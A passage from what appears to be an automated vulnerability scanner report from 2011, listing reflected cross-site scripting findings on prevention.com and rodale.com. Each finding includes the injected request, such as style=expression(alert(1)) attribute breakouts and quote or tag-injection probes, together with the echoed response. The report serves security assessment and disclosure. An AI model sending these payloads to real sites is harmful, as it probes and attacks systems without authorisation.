Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1796
Date: Thu, 10 Mar 2011 17:06:59 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 75050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<script language="javascript">
                                       gSiteLife.SummaryBlogsRecentPostsByTag(3, 'ccb17';29e646bb194')
                                   </script>
...[SNIP]...

2.115. http://www.prevention.com/health/health/a-spoonful-of-health/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/health/a-spoonful-of-health/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f24a2'style%3d'x%3aexpression(alert(1))'f6353e58e8 was submitted in the REST URL parameter 3. This input was echoed as f24a2'style='x:expression(alert(1))'f6353e58e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/health/a-spoonful-of-healthf24a2'style%3d'x%3aexpression(alert(1))'f6353e58e8/ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1792
Date: Thu, 10 Mar 2011 17:06:05 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 76657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Health-A Spoonful Of Healthf24a2'style='x:expression(alert(1))'f6353e58e8'>
...[SNIP]...

2.116. http://www.prevention.com/health/health/health-concerns/cold-flu [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/health/health-concerns/cold-flu

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8506b'style%3d'x%3aexpression(alert(1))'ca456ab48dc was submitted in the REST URL parameter 3. This input was echoed as 8506b'style='x:expression(alert(1))'ca456ab48dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/health/health-concerns8506b'style%3d'x%3aexpression(alert(1))'ca456ab48dc/cold-flu HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1798
Date: Thu, 10 Mar 2011 17:05:59 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 76868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Health-Health Concerns8506b'style='x:expression(alert(1))'ca456ab48dc-Cold Flu'>
...[SNIP]...

2.117. http://www.prevention.com/health/health/health-concerns/cold-flu [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/health/health-concerns/cold-flu

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c7db'%3b359e302bdd was submitted in the REST URL parameter 3. This input was echoed as 8c7db';359e302bdd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/health/8c7db'%3b359e302bdd/cold-flu HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1798
Date: Thu, 10 Mar 2011 17:07:05 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 75295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<script language="javascript">
                                       gSiteLife.SummaryBlogsRecentPostsByTag(3, '8c7db';359e302bdd')
                                   </script>
...[SNIP]...

2.118. http://www.prevention.com/health/health/health-concerns/cold-flu [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/health/health-concerns/cold-flu

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f7759'style%3d'x%3aexpression(alert(1))'1a2d5b8c257 was submitted in the REST URL parameter 4. This input was echoed as f7759'style='x:expression(alert(1))'1a2d5b8c257 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/health/health-concerns/cold-fluf7759'style%3d'x%3aexpression(alert(1))'1a2d5b8c257 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1796
Date: Thu, 10 Mar 2011 17:08:32 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 78626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Health-Health Concerns-Cold Fluf7759'style='x:expression(alert(1))'1a2d5b8c257'>
...[SNIP]...

2.119. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 81c81'style%3d'x%3aexpression(alert(1))'b51fcab1079 was submitted in the REST URL parameter 3. This input was echoed as 81c81'style='x:expression(alert(1))'b51fcab1079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/health/healthy-living81c81'style%3d'x%3aexpression(alert(1))'b51fcab1079/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:06:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<input type='hidden' id='category_core' value='Health-Healthy Living81c81'style='x:expression(alert(1))'b51fcab1079'>
...[SNIP]...

2.120. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fd48'%3b522e0195e8a was submitted in the REST URL parameter 3. This input was echoed as 1fd48';522e0195e8a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/health/healthy-living1fd48'%3b522e0195e8a/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/health/healthy-living1fd48';522e0195e8a/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.121. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9f35'%3be400bf10631 was submitted in the REST URL parameter 4. This input was echoed as b9f35';e400bf10631 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tipsb9f35'%3be400bf10631/article/16ee7ede8d77e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tipsb9f35';e400bf10631/article/16ee7ede8d77e210VgnVCM10000030281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.122. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f194c'style%3d'x%3aexpression(alert(1))'ba472fc708f was submitted in the REST URL parameter 5. This input was echoed as f194c'style='x:expression(alert(1))'ba472fc708f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/articlef194c'style%3d'x%3aexpression(alert(1))'ba472fc708f/16ee7ede8d77e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1791
Date: Thu, 10 Mar 2011 17:08:47 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 75725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Health-Healthy Living-Carrie Ann Inaba S Health And Fitness Tips-Articlef194c'style='x:expression(alert(1))'ba472fc708f'>
...[SNIP]...

2.123. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a849'%3bdc5a47a7224 was submitted in the REST URL parameter 6. This input was echoed as 4a849';dc5a47a7224 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____4a849'%3bdc5a47a7224 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:10:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____4a849';dc5a47a7224&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.124. http://www.prevention.com/health/health/healthy-living/pets [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/pets

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f7680'style%3d'x%3aexpression(alert(1))'535658b746c was submitted in the REST URL parameter 3. This input was echoed as f7680'style='x:expression(alert(1))'535658b746c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/health/healthy-livingf7680'style%3d'x%3aexpression(alert(1))'535658b746c/pets HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1792
Date: Thu, 10 Mar 2011 17:06:08 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 76723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Health-Healthy Livingf7680'style='x:expression(alert(1))'535658b746c-Pets'>
...[SNIP]...

2.125. http://www.prevention.com/health/health/healthy-living/pets [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/pets

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a583'%3bb7f1ba5e29d was submitted in the REST URL parameter 3. This input was echoed as 5a583';b7f1ba5e29d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/health/5a583'%3bb7f1ba5e29d/pets HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1793
Date: Thu, 10 Mar 2011 17:07:08 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 75222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<script language="javascript">
                                       gSiteLife.SummaryBlogsRecentPostsByTag(3, '5a583';b7f1ba5e29d')
                                   </script>
...[SNIP]...

2.126. http://www.prevention.com/health/health/healthy-living/pets [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/pets

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d779c'style%3d'x%3aexpression(alert(1))'8435d74058d was submitted in the REST URL parameter 4. This input was echoed as d779c'style='x:expression(alert(1))'8435d74058d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/health/healthy-living/petsd779c'style%3d'x%3aexpression(alert(1))'8435d74058d HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1795
Date: Thu, 10 Mar 2011 17:08:28 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 77836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Health-Healthy Living-Petsd779c'style='x:expression(alert(1))'8435d74058d'>
...[SNIP]...

2.127. http://www.prevention.com/health/news-voices/videos [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/news-voices/videos

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbe72'%3b67a313e6d5a was submitted in the REST URL parameter 3. This input was echoed as dbe72';67a313e6d5a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/news-voices/videosdbe72'%3b67a313e6d5a HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1795
Date: Thu, 10 Mar 2011 17:06:45 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 71224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<script language="javascript">
                                       gSiteLife.SummaryBlogsRecentPostsByTag(3, 'videosdbe72';67a313e6d5a')
                                   </script>
...[SNIP]...

2.128. http://www.prevention.com/health/news-voices/videos [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/news-voices/videos

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fcd4e'style%3d'x%3aexpression(alert(1))'c11f3ed341d was submitted in the REST URL parameter 3. This input was echoed as fcd4e'style='x:expression(alert(1))'c11f3ed341d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/news-voices/videosfcd4e'style%3d'x%3aexpression(alert(1))'c11f3ed341d HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1795
Date: Thu, 10 Mar 2011 17:05:49 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 72150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='News Voices-Videosfcd4e'style='x:expression(alert(1))'c11f3ed341d'>
...[SNIP]...

2.129. http://www.rodale.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7490"><a>1d3c29527fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?a7490"><a>1d3c29527fc=1 HTTP/1.1
Host: www.rodale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 16:43:51 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=3600
Expires: Thu, 10 Mar 2011 17:43:53 GMT
Date: Thu, 10 Mar 2011 16:43:53 GMT
Connection: close
Content-Length: 31974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/?a7490"><a>1d3c29527fc=1" title="Register" class="moreLink">
...[SNIP]...

2.130. http://www.rodale.com/1,6597,8-114,00.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /1,6597,8-114,00.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d818"><a>1374216a76b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /1,6597,8-114,00.html9d818"><a>1374216a76b HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
